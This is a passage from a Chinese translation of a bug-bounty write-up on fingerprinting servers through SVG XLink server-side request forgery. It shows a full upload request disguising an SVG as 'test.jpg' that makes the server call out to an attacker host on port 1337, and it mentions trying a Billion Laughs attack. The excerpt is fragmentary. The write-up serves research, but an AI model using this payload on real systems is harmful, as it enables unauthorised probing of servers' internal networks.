XLink
POST /upload HTTP/1.1 Host: redacted.com Connection: close Content-Length: 1313 Accept: application/json, text/ja vasc ript, */*; q=0.01 Origin: https://redacted.com X-Requested-With: xm lHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN Referer: https://redacted.com Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="timestamp"
1551244304 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="api_key"
413781391468673 ------WebKitFormBoundaryINZ5MzqXAud4aYrN Content-Disposition: form-data; name="file"; filename="test.jpg" Content-Type: image/jpeg
<?xm l version="1.0" encoding="UTF-8" standalone="no"?><svg xm lns:svg="http://www.w3.org/2000/svg" xm lns="http://www.w3.org/2000/svg" xm lns:xlink="http://www.w3.org/1999/xlink" width_="200" height="200"><image height="30" width_="30" xlink:href="http://myserver:1337/" /></svg>
http://myserver:1337/
由于解析器会拦截基于SYSTEM的实体,攻击面受到了限制。是时候测试Billion Laughs attack了。注意:在进行模糊测试前,一定要了解解析器的逻辑,在攻击之前,我测试了简单的回调实体函数,看看解析器是否允许通过回调xml2的实体来渲染xml1实体。
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:利用SVG图片和SSRF收集伺服器内部信息|NOSEC安全讯息平台 - NOSEC.ORG
原文:https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c
公司产品:FOFA-网路空间安全搜索引擎、FOEYE-网路空间检索系统、NOSEC-安全讯息平台。
为您提供:网路空间测绘、企业资产收集、企业威胁情报、应急响应服务。